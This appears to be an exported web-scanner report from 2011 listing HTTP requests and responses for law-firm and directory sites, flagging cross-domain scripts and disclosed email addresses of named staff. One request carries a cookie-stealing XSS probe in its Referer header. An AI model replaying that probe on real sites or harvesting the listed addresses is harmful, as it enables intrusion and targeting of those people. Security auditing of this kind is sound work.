<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
GET /washington%20dc%20law%20firms HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET / HTTP/1.1 Host: www.kasimer-ittig.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /2011insights.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... </script>
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <!-- end border table -->
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
GET /gypr.aspx?afid=1993&cc=5411105100&cr=3209505169&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:09:38 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:09:38 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... <body>
The response dynamically includes the following scripts from other domains:
http://cdn.gigya.com/JS/socialize.js?apikey=null
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </script>
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /index.cfm HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /x22 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 15:29:16 GMT Status: 404 Not Found Server: nginx Content-Type: text/html Connection: keep-alive Content-Length: 214516
<!DOCTYPE html> <html> <head>
<title>Page Not Found - YP.com</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="" name="description" /> <meta content="" name ...[SNIP]... <![endif]--> <script src="http://i2.ypcdn.com/webyp/javascripts/css_browser_selector.js?12909" type="text/javascript"></script>
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
pcware@tiac.net
pcwh@erols.com
Request
GET /computer.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:31 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 88403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The following email address was disclosed in the response:
sbaird@a-job.com
Request
GET /jobs.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:51 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 51092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
...[SNIP]... </i>--Creative One Source represents the region.s top freelance web and interactive media talent. Sally Baird at (703) 299-6100 or e-mail sbaird@a-job.com<br> ...[SNIP]...
The following email addresses were disclosed in the response:
LISTSERV@PAHO.ORG
RITCH-L@PAHO.ORG
marco@clark.net
Request
GET /other.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:22:08 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 159702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The following email addresses were disclosed in the response:
dcreg@usedbks.com
maxwonder@aa.action.com
uws333@haven.los.com
Request
GET /shopping.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:22:14 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 108349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The following email address was disclosed in the response:
todd@wpaudio.com
Request
GET /wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js?ver=3.1 HTTP/1.1 Host: financaspessoais.blog.br Proxy-Connection: keep-alive Referer: http://financaspessoais.blog.br/?f8184%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec42c81b1212=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=239951252.1295480312.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/51; __utma=239951252.1616361418.1295480312.1295480312.1295480312.1; __utmc=239951252; __utmb=239951252.1.10.1295480312
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 23:37:43 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch Last-Modified: Tue, 09 Nov 2010 17:06:21 GMT ETag: "1e855a-22a4-494a1c2853d40" Accept-Ranges: bytes Content-Length: 8868 Connection: close Content-Type: application/x-javascript
/* * WPaudio v3.1 (http://wpaudio.com) * by Todd Iceton (todd@wpaudio.com) * * Converts an mp3 link to a simple player styled by HTML & CSS, powered by HTML5 with SoundManager2 Flash fallback * * Copyright 2010 Todd Iceton (email: todd@wpaudio.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of ...[SNIP]...
The following email address was disclosed in the response:
sales@gfi.com
Request
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
The following email address was disclosed in the response:
free2rhyme@yahoo.com
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... <p id='ex'>(e.g. free2rhyme@yahoo.com)</p> ...[SNIP]...
The following email address was disclosed in the response:
john.doe@asdf.com
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <input name="email0" value="john.doe@asdf.com" type="radio">john.doe@asdf.com</li> ...[SNIP]...
The following email addresses were disclosed in the response:
amy.sabrin@skadden.com
greg.luce@skadden.com
jen.spaziano@skadden.com
mitchell.ettinger@skadden.com
Request
GET /fca/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email addresses were disclosed in the response:
brian.mccarthy@skadden.com
greg.luce@skadden.com
mark.cheffo@skadden.com
matthew.kipp@skadden.com
michael.loucks@skadden.com
Request
GET /hc/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
sam@twittercounter.com
Request
GET /rafaelp HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:15:07 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a href="mailto:sam@twittercounter.com" rel="nofollow" title="Get in contact with TwitterCounter"> ...[SNIP]...
The following email address was disclosed in the response:
Marsha.Tucker@aporter.com
Request
GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following email address was disclosed in the response:
events@aporter.com
Request
GET /events.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following email addresses were disclosed in the response:
Stephen.DiGennaro@aporter.com
mailings.administrator@aporter.com
Request
GET /globals_privacy_policy.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2> </body></html>
<!DOCTYPE HTML PUBLIC "-/ ...[SNIP]... </div>eeliasoph@cov.com
The following email address was disclosed in the response:
info@dcchamber.org
Request
GET /chamber/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="mailto:info@dcchamber.org"> ...[SNIP]... <a href="mailto:info@dcchamber.org">info@dcchamber.org</a> ...[SNIP]...
/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * Thanks to: ...[SNIP]...
The following email address was disclosed in the response:
rreif@ebglaw.com
Request
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <a href="mailto:rreif@ebglaw.com">rreif@ebglaw.com</a> ...[SNIP]...
/* Prototype JavaScript framework, version 1.5.0_rc1 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see ...[SNIP]...
// this is where we write out the VBScript for MSIE Windows var WM_startTagFix = '</'; var msie_windows = 0; if ((navigator.userAgent.indexOf('MSIE') != -1) ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>